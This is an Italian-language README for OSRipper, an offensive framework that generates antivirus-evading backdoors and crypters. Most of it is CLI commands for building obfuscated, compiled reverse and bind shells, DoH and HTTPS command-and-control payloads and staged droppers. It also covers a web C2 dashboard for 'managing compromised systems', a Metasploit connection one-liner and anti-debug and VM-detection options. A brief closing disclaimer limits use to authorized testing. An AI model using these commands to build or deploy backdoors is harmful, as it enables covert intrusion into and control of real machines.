
Framework di backdoor e crypter multipiattaforma che elude l'antivirus, con un webUI leggero integrato.

Generatore di payload e cryptor cross-platform avanzato con capacità FUD
Caratteristiche • Avvio Rapido • Interfaccia Web • Tipi di Payload • Documentazione
OSRipper è un sofisticato generatore di backdoor e cryptor completamente non rilevabile (FUD), progettato per test di penetrazione autorizzati e operazioni red team. Dispone di tecniche di evasione avanzate, molteplici tipi di payload e un'interfaccia C2 moderna basata sul web per la gestione dei sistemi compromessi.
| Tipo Payload | Descrizione | Caso d'Uso |
|---|---|---|
| Bind Shell | Apre una porta sulla macchina vittima | Accesso diretto quando le connessioni reverse sono bloccate |
| Reverse TCP Meterpreter | Connessione reverse criptata SSL/TLS | Test di penetrazione standard |
| DNS-over-HTTPS C2 | Canale C2 stealth basato su DoH | Bypassare restrizioni di rete |
| HTTPS C2 | Canale C2 HTTPS con pinning del certificato | Canale C2 sicuro e autenticato |
| Payload Staged | Consegna web multi-stadio | Distribuzione stealth potenziata |
| Cryptor Codice Personalizzato | Offusca qualsiasi script Python | Criptazione payload personalizzata |
# Clona il repository
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
# Installa le dipendenze
pip3 install -r requirements.txt
# Installa il pacchetto
pip3 install -e .
Importante — esegui il setup per funzionalità opzionali (ngrok, compilazione binaria):
Su molti sistemi (specialmente Linux con un ambiente Python gestito esternamente), devi eseguire il setup integrato in modo che le dipendenze opzionali vengano installate nel venv di OSRipper. Fallo una volta dopo l'installazione:
osripper-cli setup
Questo crea ~/.local/share/osripper/venv, installa pyngrok, nuitka e sandboxed lì, e tutte le esecuzioni successive di osripper / osripper-cli li useranno automaticamente. Senza questo, --ngrok e --compile ti chiederanno di eseguire il setup. Usa osripper-cli setup --system solo se preferisci un'installazione pip di sistema/utente invece del venv.
Modalità Interattiva:
osripper
# oppure
python3 -m osripper
Riga di Comando:
# Genera reverse shell
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile
# Genera payload DoH C2
osripper-cli doh -d example.com --obfuscate --compile
Interfaccia Web:
# Avvia il server C2 con interfaccia web
python -m osripper.c2.server example.com --port 5000
# Accedi alla dashboard su http://localhost:5000
OSRipper include un'interfaccia C2 moderna basata sul web per la gestione dei sistemi compromessi.
# Utilizzo base
python -m osripper.c2.server example.com
# Con HTTPS
python -m osripper.c2.server example.com --https
# Porta personalizzata
python -m osripper.c2.server example.com --port 8080
# Con certificato personalizzato
python -m osripper.c2.server example.com --https --cert server.crt --key server.key
Una volta che il server è in esecuzione, accedi alla dashboard su:
http://localhost:5000https://localhost:5000 (se abilitato)Apre una porta sulla macchina vittima e attende connessioni.
osripper-cli bind -p 4444 --obfuscate --compile
Connessione:
msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST ip_vittima; set RPORT 4444; exploit'
Connessione reverse criptata con SSL/TLS.
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile
Canale C2 stealth che utilizza il protocollo DNS-over-HTTPS. Bypassa molte restrizioni di rete.
# Genera payload
osripper-cli doh -d example.com --obfuscate --compile
# Avvia server C2
python -m osripper.c2.server example.com
Caratteristiche:
HTTPS C2 sicuro con pinning del certificato per l'autenticazione.
# Genera payload (tramite interfaccia web o CLI)
# Avvia server C2 con HTTPS
python -m osripper.c2.server example.com --https
# Ottieni l'impronta del certificato
curl http://localhost:5000/api/cert-fingerprint
Caratteristiche:
Consegna web multi-stadio per stealth potenziato.
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate
Offusca e cripta qualsiasi script Python.
osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile
| Opzione | Descrizione |
|---|---|
--obfuscate | Abilita offuscamento multi-livello |
--enhanced | Offuscamento potenziato (anti-debug, rilevamento VM) |
--compile | Compila in binario autonomo |
--icon PERCORSO | Icona personalizzata per il binario compilato |
--delay | Aggiunge ritardo di avvio casuale (5-15 secondi) |
--output, -o NOME | Nome file di output |
--quiet, -q | Modalità silenziosa (output minimo) |
# Reverse shell completo
osripper-cli reverse -H 192.168.1.100 -p 4444 \
--obfuscate --enhanced --compile --icon app.ico --delay
# DoH C2 con tutte le funzionalità
osripper-cli doh -d example.com \
--obfuscate --enhanced --compile --delay
# Criptazione script personalizzato
osripper-cli custom --script malware.py \
--obfuscate --enhanced --compile
# Utilizzo di ngrok per IP dinamico
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

┌─────────────────┐
│ Binario │
│ Generato │
└─────────────────┘
│
│ Esecuzione
▼
┌──────────────────┐
│ Dropper │
│ Offuscato │
└──────────────────┘
│
│ HTTP/HTTPS/DoH
▼
┌─────────────────┐
│ │
│ SERVER C2 │
│ (Interfaccia │
│ Web) │
│ │
└─────────────────┘
│
│ Comando/Risposta
▼
┌─────────────────┐
│ Agente │
│ Esecuzione │
└─────────────────┘

# Genera payload con ngrok
osripper-cli reverse --ngrok -p 4444
# Segui le istruzioni per configurare il tunnel
# Esegui: ngrok tcp 4444
osripper-cli reverse -H 192.168.1.100 -p 4444 \
--compile --icon /percorso/icona.ico
Offuscamento Standard:
Offuscamento Potenziato:
# Standard
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate
# Potenziato
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced
# 1. Avvia server C2 con HTTPS
python -m osripper.c2.server example.com --https
# 2. Ottieni l'impronta del certificato
curl http://localhost:5000/api/cert-fingerprint
# 3. Genera payload con l'impronta (tramite interfaccia web)
# Oppure usa l'impronta nella generazione del payload
Accogliamo con favore i contributi della comunità di ricerca sulla sicurezza!
git checkout -b feature/funzionalità-straordinaria)git commit -m 'Aggiungi funzionalità straordinaria')git push origin feature/funzionalità-straordinaria)Un ringraziamento speciale alla comunità di ricerca sulla sicurezza e a questi progetti:
IMPORTANTE: Questo strumento è sviluppato esclusivamente per scopi educativi e test di penetrazione autorizzati.
Gli sviluppatori non sono responsabili per l'uso improprio di questo software. Gli utenti devono rispettare tutte le leggi e le normative applicabili.